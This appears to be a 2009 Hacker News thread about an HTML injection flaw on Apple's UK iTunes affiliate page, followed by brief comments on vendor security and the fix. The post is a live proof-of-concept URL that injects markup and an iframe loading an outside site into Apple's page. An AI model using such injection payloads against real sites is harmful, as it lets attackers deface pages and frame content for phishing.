

ITunes website open to HTML injection...again (lgt example). [WARNING: autoplay] - blhack
http://www.apple.com/uk/itunes/affiliates/download/?artistName=%3Cblink%3EApple%20%3Cmarquee%3E%3Cbr/%3E%20%3Ciframe%20src=http%3A%2F%2Fwww.sharperfx.com%2Fnb1%2F%20width=800%20height=400%3E%3C/iframe%3E&thumbnailUrl=http%3A//images.apple.com/home/images/promo_mac_ads_20091022.jpg&itmsUrl=http%3A%2F%2Fitunes.apple.com%2FWebObjects%2FMZStore.woa%2Fwa%2FviewAlbum%3Fid%3D330407877%26s%3D143444%26ign-mscache%3D1&albumName=%3Cblink%3Ea%20wide-open%20HTML%20injection%20hole

======
blhack
Credit to SSChicken who pointed this out in a reddit comment thread.

Permalink to their comment:

[http://www.reddit.com/r/technology/comments/a5osy/oh_apple_w...](http://www.reddit.com/r/technology/comments/a5osy/oh_apple_when_will_you_learn/c0fypfm)

------
tptacek
And this is interesting because...?

~~~
roc
Because we'd like to think professionals (particularly those who flog their
platforms' security) would validate their input, in this, the year 2009.

~~~
tptacek
What vendor has not had similar problems in 2009? What's the vendor that says
_negative_ things about their own security?

------
blhack
Well, it looks as though they have fixed it for now. Apple, this is
depressing.

------
calebgilbert
Somehow I never tire of these. :-)

